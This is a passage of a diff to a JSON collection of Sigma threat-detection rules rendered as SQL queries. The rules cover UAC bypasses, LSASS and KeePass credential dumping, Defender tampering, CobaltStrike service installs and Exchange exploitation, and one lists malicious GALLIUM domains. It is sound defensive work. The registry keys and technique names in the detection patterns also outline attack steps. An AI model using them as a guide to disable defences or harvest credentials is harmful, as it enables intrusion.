AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND StartModule LIKE '%\\\\kernel32.dll' ESCAPE '\\' AND StartFunction = 'LoadLibraryA')" ], - "filename": "registry_set_office_outlook_enable_unsafe_client_mail_rules.yml" + "filename": "create_remote_thread_win_loadlibrary.yml" }, { - "title": "UAC Bypass Abusing Winsat Path Parsing - Registry", - "id": "6597be7b-ac61-4ac8-bef4-d3ec88174853", + "title": "CACTUSTORCH Remote Thread Creation", + "id": "2e4e488a-6164-4811-9ea1-f960c7359c40", "status": "test", - "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects remote thread creation from CACTUSTORCH as described in references.", + "author": "@SBousseaden (detection), Thomas Patzke (rule)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1055.012", + "attack.execution", + "attack.t1059.005", + "attack.t1059.007", + "attack.t1218.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Root\\\\InventoryApplicationFile\\\\winsat.exe|%' ESCAPE '\\' AND TargetObject LIKE '%\\\\LowerCaseLongPath' ESCAPE '\\' AND Details LIKE 'c:\\\\users\\\\%' ESCAPE '\\' AND Details LIKE '%\\\\appdata\\\\local\\\\temp\\\\system32\\\\winsat.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\System32\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\wscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' AND StartModule = '')" ], - "filename": "registry_set_uac_bypass_winsat.yml" + "filename": "create_remote_thread_win_cactustorch.yml" }, { - "title": "Potential Persistence Via AutodialDLL", - "id": "e6fe26ee-d063-4f5b-b007-39e90aaf50e3", + "title": "KeePass Password Dumping", + "id": "77564cc2-7382-438b-a7f6-395c2ae53b9a", "status": "experimental", - "description": "Detects change the the \"AutodialDLL\" key which could be used as a persistence method to load custom DLL via the \"ws2_32\" library", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects remote thread creation in KeePass.exe indicating password dumping activity", + "author": "Timon Hackenjos", "tags": [ - "attack.persistence" + "attack.credential_access", + "attack.t1555.005" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\WinSock2\\\\Parameters\\\\AutodialDLL%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\KeePass.exe' ESCAPE '\\')" ], - "filename": "registry_set_persistence_autodial_dll.yml" + "filename": "create_remote_thread_win_password_dumper_keepass.yml" }, { - "title": "Potential Attachment Manager Settings Attachments Tamper", - "id": "ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a", + "title": "Suspicious Remote Thread Source", + "id": "66d31e5f-52d6-40a4-9615-002d3789a119", "status": "experimental", - "description": "Detects tampering with attachment manager settings policies attachments (See reference for more information)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", + "author": "Perez Diego (@darkquassar), oscd.community", "tags": [ - "attack.defense_evasion" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1055" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Attachments\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\HideZoneInfoOnProperties' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR (TargetObject LIKE '%\\\\SaveZoneInformation' ESCAPE '\\' AND Details = 'DWORD (0x00000002)') OR (TargetObject LIKE '%\\\\ScanWithAntiVirus' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')))" + "SELECT * FROM logs WHERE ((EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (SourceImage LIKE '%\\\\bash.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cvtres.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\defrag.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dnx.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\expand.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\find.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\findstr.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\hh.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\installutil.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\lync.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\makecab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mDNSResponder.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\outlook.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ping.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\provtool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\python.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\runonce.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\sapcimc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\tstheme.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\userinit.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winscp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wmic.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND NOT ((SourceImage LIKE '%Visual Studio%' ESCAPE '\\' OR SourceParentImage LIKE '%\\\\Programs\\\\Microsoft VS Code\\\\%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND TargetParentImage = 'System' AND TargetParentProcessId = '4') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\provtool.exe' ESCAPE '\\' AND TargetParentProcessId = '0') OR (SourceImage LIKE '%\\\\git.exe' ESCAPE '\\' AND (TargetImage LIKE '%\\\\git.exe' ESCAPE '\\' OR TargetImage LIKE '%C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\VSSVC.exe' ESCAPE '\\' AND TargetImage = 'System') OR (SourceParentImage LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\schtasks.exe' ESCAPE '\\') AND TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\NVIDIA Corporation\\\\NVIDIA GeForce Experience\\\\NVIDIA GeForce Experience.exe' ESCAPE '\\')))" ], - "filename": "registry_set_policies_attachments_tamper.yml" + "filename": "create_remote_thread_win_susp_remote_thread_source.yml" }, { - "title": "Lsass Full Dump Request Via DumpType Registry Settings", - "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f719", - "status": "experimental", - "description": "Detects the setting of the \"DumpType\" registry value to \"2\" which stands for a \"Full Dump\". Technique such as LSASS Shtinkering requires this value to be \"2\" in order to dump LSASS.", - "author": "@pbssubhash", + "title": "Password Dumper Remote Thread in LSASS", + "id": "f239b326-2f41-4d6b-9dfa-c846a60ef505", + "status": "stable", + "description": "Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage.\nThe process in field Process is the malicious program. A single execution can lead to hundreds of events.\n", + "author": "Thomas Patzke", "tags": [ "attack.credential_access", + "attack.s0005", "attack.t1003.001" ], "falsepositives": [ - "Legitimate application that needs to do a full dump of their process" + "Antivirus products" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\DumpType%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\lsass.exe\\\\DumpType%' ESCAPE '\\') AND Details = 'DWORD (0x00000002)')" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND StartModule = '')" ], - "filename": "registry_set_lsass_usermode_dumping.yml" + "filename": "create_remote_thread_win_password_dumper_lsass.yml" }, { - "title": "New File Association Using Exefile", - "id": "44a22d59-b175-4f13-8c16-cbaef5b581ff", + "title": "DNS Server Error Failed Loading the ServerLevelPluginDLL", + "id": "cbe51394-cd93-4473-b555-edf0144952d9", "status": "test", - "description": "Detects the abuse of the exefile handler in new file association. Used for bypass of security products.", - "author": "Andreas Hunkeler (@Karneades)", + "description": "Detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Classes\\\\.%' ESCAPE '\\' AND Details = 'exefile' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE (Channel = 'DNS Server' AND EventID IN ('150', '770', '771'))" ], - "filename": "registry_set_file_association_exefile.yml" + "filename": "win_dns_server_susp_server_level_plugin_dll.yml" }, { - "title": "Windows Defender Service Disabled", - "id": "e1aa95de-610a-427d-b9e7-9b46cfafbe6a", + "title": "Unsigned Binary Loaded From Suspicious Location", + "id": "8289bf8c-4aca-4f5a-9db3-dc3d7afe5c10", "status": "experimental", - "description": "Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry", - "author": "Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali", + "description": "Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Administrator actions" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\WinDefend\\\\Start' ESCAPE '\\' AND Details = 'DWORD (0x00000004)')" - ], - "filename": "registry_set_disable_windows_defender_service.yml" - }, - { - "title": "Winlogon Notify Key Logon Persistence", - "id": "bbf59793-6efb-4fa1-95ca-a7d288e52c88", - "status": "test", - "description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.\nWinlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\n", - "author": "frack113", - "tags": [ - "attack.persistence", - "attack.t1547.004" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Notify\\\\logon' ESCAPE '\\' AND Details LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ImageName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR ImageName LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\'))" ], - "filename": "registry_set_winlogon_notify_key.yml" + "filename": "win_security_mitigations_unsigned_dll_from_susp_location.yml" }, { - "title": "Office Security Settings Changed", - "id": "a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd", + "title": "Microsoft Defender Blocked from Loading Unsigned DLL", + "id": "0b0ea3cc-99c8-4730-9c53-45deee2a4c86", "status": "experimental", - "description": "Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. (see references)", - "author": "Trent Liffick (@tliffick)", + "description": "Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL", + "author": "Bhabesh Raj", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1574.002" ], "falsepositives": [ - "Valid Macros and/or internal documents" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Security\\\\Trusted Documents\\\\TrustRecords' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\AccessVBOM' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\VBAWarnings' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ProcessPath LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR ProcessPath LIKE '%\\\\NisSrv.exe' ESCAPE '\\'))" ], - "filename": "registry_set_office_security.yml" + "filename": "win_security_mitigations_defender_load_unsigned_dll.yml" }, { - "title": "Bypass UAC Using SilentCleanup Task", - "id": "724ea201-6514-4f38-9739-e5973c34f49a", - "status": "test", - "description": "There is an auto-elevated task called SilentCleanup located in %windir%\\system32\\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC", + "title": "Standard User In High Privileged Group", + "id": "7ac407cc-0f48-4328-aede-de1d2e6fef41", + "status": "experimental", + "description": "Detect standard users login that are part of high privileged groups such as the Administrator group", "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" + "attack.credential_access", + "attack.privilege_escalation" ], "falsepositives": [ - "Unknown" + "Standard domain users who are part of the administrator group. These users shouldn't have these right. But in the case where it's necessary. They should be filtered out using the \"TargetUserName\" field" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Environment\\\\windir' ESCAPE '\\' AND Details LIKE '%&REM%' ESCAPE '\\' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-LSA/Operational' AND (EventID = '300' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND (SidList LIKE '%S-1-5-32-544%' ESCAPE '\\' OR SidList LIKE '%-500}%' ESCAPE '\\' OR SidList LIKE '%-518}%' ESCAPE '\\' OR SidList LIKE '%-519}%' ESCAPE '\\')) AND NOT ((TargetUserSid LIKE '%-500' ESCAPE '\\' OR TargetUserSid LIKE '%-518' ESCAPE '\\' OR TargetUserSid LIKE '%-519' ESCAPE '\\')))" ], - "filename": "registry_set_bypass_uac_using_silentcleanup_task.yml" + "filename": "win_lsa_server_normal_user_admin.yml" }, { - "title": "Disabled Windows Defender Eventlog", - "id": "fcddca7c-b9c0-4ddf-98da-e1e2d18b0157", - "status": "experimental", - "description": "Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections", - "author": "Florian Roth (Nextron Systems)", + "title": "Exchange Set OabVirtualDirectory ExternalUrl Property", + "id": "9db37458-4df2-46a5-95ab-307e7f29e675", + "status": "test", + "description": "Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log", + "author": "Jose Rodriguez @Cyb3rPandaH", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ - "Other Antivirus software installations could cause Windows to disable that eventlog (unknown)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Windows Defender/Operational\\\\Enabled%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Set-OabVirtualDirectory' AND = 'ExternalUrl' AND LIKE 'Page\\_Load' ESCAPE '\\' AND = 'script')" ], - "filename": "registry_set_disabled_microsoft_defender_eventlog.yml" + "filename": "win_exchange_set_oabvirtualdirectory_externalurl.yml" }, { - "title": "DHCP Callout DLL Installation", - "id": "9d3436ef-9476-4c43-acca-90ce06bdf33a", - "status": "test", - "description": "Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)", - "author": "Dimitrios Slamaris", + "title": "Failed MSExchange Transport Agent Installation", + "id": "c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa", + "status": "experimental", + "description": "Detects a failed installation of a Exchange Transport Agent", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1112" + "attack.persistence", + "attack.t1505.002" ], "falsepositives": [ - "Unknown" + "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutDlls' ESCAPE '\\' OR TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutEnabled' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID = '6' AND Data LIKE '%Install-TransportAgent%' ESCAPE '\\')" ], - "filename": "registry_set_dhcp_calloutdll.yml" + "filename": "win_exchange_transportagent_failed.yml" }, { - "title": "CobaltStrike Service Installations in Registry", - "id": "61a7697c-cb79-42a8-a2ff-5f0cdfae0130", - "status": "test", - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.\nWe can also catch this by system log 7045 (https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_cobaltstrike_service_installs.yml)\nIn some SIEM you can catch those events also in HKLM\\System\\ControlSet001\\Services or HKLM\\System\\ControlSet002\\Services, however, this rule is based on a regular sysmon's events.\n", - "author": "Wojciech Lesicki", + "title": "Possible Exploitation of Exchange RCE CVE-2021-42321", + "id": "c92f1896-d1d2-43c3-92d5-7a5b35c217bb", + "status": "experimental", + "description": "Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321", + "author": "Florian Roth (Nextron Systems), @testanull", "tags": [ - "attack.execution", - "attack.privilege_escalation", "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" + "attack.t1210" ], "falsepositives": [ - "Unknown" + "Unknown, please report false positives via https://github.com/SigmaHQ/sigma/issues" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%HKLM\\\\System\\\\CurrentControlSet\\\\Services%' ESCAPE '\\') AND ((Details LIKE '%ADMIN$%' ESCAPE '\\' AND Details LIKE '%.exe%' ESCAPE '\\') OR (Details LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND Details LIKE '%start%' ESCAPE '\\' AND Details LIKE '%powershell%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID IN ('6', '8') AND (Data LIKE '%Cmdlet failed. Cmdlet Get-App, %' ESCAPE '\\' OR Data LIKE '%Task Get-App throwing unhandled exception: System.InvalidCastException:%' ESCAPE '\\'))" ], - "filename": "registry_set_cobaltstrike_service_installs.yml" + "filename": "win_exchange_cve_2021_42321.yml" }, { - "title": "Wdigest Enable UseLogonCredential", - "id": "d6a9b252-c666-4de6-8806-5561bbbd3bdc", + "title": "Remove Exported Mailbox from Exchange Webserver", + "id": "09570ae5-889e-43ea-aac0-0e1221fb3d95", "status": "test", - "description": "Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to enable clear-text credentials", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1070" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%WDigest\\\\UseLogonCredential' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Remove-MailboxExportRequest' AND = ' -Identity ' AND = ' -Confirm \"False\"')" ], - "filename": "registry_set_wdigest_enable_uselogoncredential.yml" + "filename": "win_exchange_proxyshell_remove_mailbox_export.yml" }, { - "title": "VBScript Payload Stored in Registry", - "id": "46490193-1b22-4c29-bdd6-5bf63907216f", + "title": "Important Scheduled Task Deleted", + "id": "9e3cb244-bdb8-4632-8c90-6079c8f4f16d", "status": "experimental", - "description": "Detects VBScript content stored into registry keys as seen being used by UNC2452 group", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when adversaries try to stop system services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.impact", + "attack.t1489" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (Details LIKE '%vbscript:%' ESCAPE '\\' OR Details LIKE '%jscript:%' ESCAPE '\\' OR Details LIKE '%mshtml,%' ESCAPE '\\' OR Details LIKE '%RunHTMLApplication%' ESCAPE '\\' OR Details LIKE '%Execute(%' ESCAPE '\\' OR Details LIKE '%CreateObject%' ESCAPE '\\' OR Details LIKE '%window.close%' ESCAPE '\\')) AND NOT ((TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\') OR (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Installer\\\\UserData\\\\%' ESCAPE '\\' AND (Details LIKE '%\\\\Microsoft.NET\\\\Primary Interop Assemblies\\\\Microsoft.mshtml.dll%' ESCAPE '\\' OR Details LIKE '%<\\\\Microsoft.mshtml,fileVersion=%' ESCAPE '\\' OR Details LIKE '%\\_mshtml\\_dll\\_%' ESCAPE '\\' OR Details LIKE '%<\\\\Microsoft.mshtml,culture=%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '141' AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((UserName LIKE '%AUTHORI%' ESCAPE '\\' OR UserName LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "registry_set_vbs_payload_stored.yml" + "filename": "win_taskscheduler_susp_schtasks_delete.yml" }, { - "title": "Disable Microsoft Office Security Features", - "id": "7c637634-c95d-4bbf-b26c-a82510874b34", + "title": "GALLIUM Artefacts - Builtin", + "id": "3db10f25-2527-4b79-8d4b-471eb900ee29", "status": "test", - "description": "Disable Microsoft Office Security Features by registry", - "author": "frack113", + "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", + "author": "Tim Burrell", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.credential_access", + "attack.command_and_control", + "attack.t1071" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%VBAWarnings' ESCAPE '\\' OR TargetObject LIKE '%DisableInternetFilesInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableUnsafeLocationsInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableAttachementsInPV' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (EventID = '257' AND QNAME IN ('asyspy256.ddns.net', 'hotkillmail9sddcc.ddns.net', 'rosaf112.ddns.net', 'cvdfhjh1231.myftp.biz', 'sz2016rose.ddns.net', 'dffwescwer4325.myftp.biz', 'cvdfhjh1231.ddns.net'))" ], - "filename": "registry_set_disable_microsoft_office_security_features.yml" + "filename": "win_dns_analytic_apt_gallium.yml" }, { - "title": "Disable Security Events Logging Adding Reg Key MiniNt", - "id": "919f2ef0-be2d-4a7a-b635-eb2b41fde044", - "status": "test", - "description": "Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, Windows Event Log service will stopped write events.", - "author": "Ilyas Ochkov, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" - ], + "title": "New Firewall Exception Rule Added For A Suspicious Folder", + "id": "9e2575e7-2cb9-4da1-adc8-ed94221dca5e", + "status": "experimental", + "description": "Detects the addition of a rule to the Windows Firewall exception list where the application resides in a suspicious folder", + "author": "frack113", 